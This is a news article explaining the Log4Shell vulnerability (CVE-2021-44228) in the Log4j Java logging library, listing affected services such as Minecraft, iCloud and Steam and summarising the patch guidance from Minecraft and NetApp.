The Log4j vulnerability–first reported on Friday– is turning out to be a cybersecurity nightmare that likely impacts a wide range of products from Apple’s iCloud to Twitter to Microsoft’s Minecraft to Amazon and a number of other enterprise products.
The Log4j software flaw as reported by cybersecurity researchers could allow attackers to have uncontrolled access to computer systems, and even the US government’s cybersecurity agency has issued a warning on the same. Here’s everything we know so far.
The vulnerability is also dubbed as Log4Shell and was first highlighted by researchers at LunaSec. The issue was discovered in Microsoft-owned Minecraft, though LunaSec warns that “many, many services” are vulnerable to this exploit due to Log4j’s “ubiquitous” presence. The reason is that this particular open-source Java library is used in almost all major Java-based enterprise apps and servers across the industry.
Dubbed CVE-2021-44228 (the official name given to each software vulnerability as it is discovered), the vulnerability can allow an attacker to control and execute ‘arbitrary code’ and gain access to a computer system. It can allow a hacker to gain complete control of a server when exploited correctly. The Log4j library in Java is used to keep a record of all activity in an application and is thus very commonly used by software developers across the world.
The technical definition in the CVE library states that “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” The worrisome part here is that the exploit has likely been used by hackers to gain access to certain computer systems, and now that the exploit is in the open, companies will have to patch it soon.
According to reports, the problem appears to have been patched for everyone on Log4j 2.15.0 and above as the behaviour has been disabled by default.
According to cybersecurity firm LunaSec, many services are vulnerable to the Log4Shell exploit, including gaming service Steam, Apple’s iCloud, etc. Microsoft’s Minecraft has already issued a statement on how users can update the game to avoid the issue. Other open-source projects such as Paper are also issuing patches to fix the problem, adds the blog.
On Github, the companies impacted listed as Apple, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, CloudFlare, Amazon, Tesla, Google, Webex, LinkedIn, etc. LunaSec also notes that simply changing an iPhone’s name was triggering the vulnerability in Apple’s servers. Most of the companies are yet to issue a statement.
Minecraft in a statement said that the Minecraft Java Edition is impacted and it poses a risk of the computer getting compromised. The Java Edition allows crossplay between Windows, macOS, and Linux for Minecraft players.
The statement adds that the exploit has been “addressed with all versions of the game client patched,” but users will still need to take additional steps to secure the game and their servers. For those who are not hosting Minecraft Java Edition on their own servers, they will need to close all running instances of the game and the Minecraft Launcher. They have to then start the launchers again and the “patched version will download automatically.”
For those on modified clients and third-party launchers, the automatic downloads might not take place, and Minecraft is recommending “following the advice of your third-party provider.”
“If the third-party provider has not patched the vulnerability, or has not stated it is safe to play, you should assume the vulnerability is not fixed and you are at risk by playing,” the statement adds.
Meanwhile, NetApp, which provides data management solutions for the Cloud, has also put out a statement that its products are vulnerable given they adopt Log4j widely. The statement added that all versions to 2.15.0 are susceptible to the vulnerability and “successful exploitation of this vulnerability could lead to the disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).”
According to Wired, researchers suspect many mainstream services will be affected. Further, some Twitter users began changing their display names to code strings that could trigger the exploit.